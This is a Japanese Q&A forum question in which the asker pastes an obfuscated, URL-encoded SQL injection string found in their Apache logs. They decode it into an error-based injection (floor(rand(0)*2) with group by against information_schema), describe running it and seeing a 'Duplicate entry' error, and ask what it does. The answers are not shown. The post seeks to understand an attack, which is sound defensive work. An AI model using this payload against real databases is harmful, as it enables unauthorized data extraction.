apacheのログでSQLインジェクションのコードを発見しました。
元々は、こうなっていました。
=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)2))x+%2f%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)
urlデコード等をして展開してみると以下のSQL文となりました。
(
select 1 from(
select count(*),concat(
(
select(
select unhex(
hex(
concat('!!','ABC145ZQ62DWQAFPOIYCFD','!!')
)
)
) from information_schema.tables limit 0,1
),
floor(rand(0)*2)
)
x from information_schema.tables groupby x
)a
)
これが何をしようとしているのかが分かりません。
またSQLの実行をしてもエラーとなりました。展開が間違っているのでしょうか?
エラーとなっていたのはこのあたりで、
x from information_schema.tables groupby x
ここを
from information_schema.tables
というようにxを省けば実行できて1という値が返ってきました。
お手数をおかけしますがご教示願えますでしょうか。
後書き:groupbyはgroup byとすることでエラーは解消されました。
その際、Duplicate entry '!!ABC145ZQ62DWQAFPOIYCFD!!1' for key 'group_key' というエラーメッセージが出ました。
回答2件
あなたの回答
tips
プレビュー
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2016/02/12 10:43
2016/02/15 01:06
2016/02/16 11:34